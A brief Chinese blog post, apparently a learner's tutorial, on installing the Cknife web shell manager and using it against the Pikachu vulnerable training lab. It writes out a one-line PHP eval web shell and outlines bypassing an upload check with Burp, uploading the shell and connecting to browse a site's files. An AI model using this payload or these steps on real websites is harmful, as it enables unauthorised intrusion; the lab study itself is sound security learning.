下载菜刀,打开Cknife.jar软件
注意:这里的菜刀文件存放的目录不要带有中文
打开
没错,这是我们熟悉的pikachu
但是这个网站的上传漏洞我还没学,所以暂时没法操作(等发了上传漏洞的视频我就来改)
基本思路就是
我可以在这里
绕过上传(通过burp抓包,改包,放包),把这个<?php @eval($_POST['pass']);?>
上传了,然后用菜刀,连接到这个网址下我们的菜刀文件上,右键点击文件管理,就可以获取整个网站的目录了。
Cknife的安装
最新推荐文章于 2022-08-31 09:36:58 发布